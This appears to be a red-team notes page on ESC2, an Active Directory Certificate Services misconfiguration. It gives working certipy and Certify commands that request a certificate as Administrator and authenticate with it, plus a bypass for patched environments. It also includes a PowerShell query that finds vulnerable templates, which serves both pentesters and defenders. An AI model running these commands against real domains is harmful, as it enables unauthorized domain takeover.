# ESC2

ESC2 is a variation of [ESC1](https://otter.gitbook.io/red-teaming/notes/adcs/esc1) and requires the following conditions to be met

* Any Purpose EKU which allows the attacker to get a certificate that can be used for all purposes (Client Authentication, Code Signing, ...)
* `ENROLLEE_SUPPLIES_SUBJECT` attribute enabled
* a user with enrollment rights
* manager approval turned off

To make it easier to remember, the only difference between ESC1 and ESC2 is the require EKU. If, for some reason, a certificate template is configured with no EKU, we will be able to use it just like a template with Any Purpose EKU.

Usually, certificates vulnerable to ESC2 could also be exploited with ESC1: to abuse ESC2 we need to, once again, add an alternative user in the Certificate Signing Request and authenticate with it.

{% code overflow="wrap" %}

```
certipy req -u otter -p 'SomethingSecure123!' -ca otter-CA -template ESC2 -upn Administrator
```

{% endcode %}

{% code overflow="wrap" %}

```
certipy auth -pfx administrator.pfx -username administrator -domain domain.com -dc-ip 10.10.10.10
```

{% endcode %}

We can enumerate the misconfiguration from Powershell as well

{% code overflow="wrap" %}

```powershell
Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=domain,DC=com'
```

{% endcode %}

Once again, if working in a CBA-patched environment we can use Certify's (or Ceritipy's) `sidextension` argument

{% code overflow="wrap" %}

```powershell
.\Certify.exe request /ca:domain.com\otter-CA /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:otter.com
```

{% endcode %}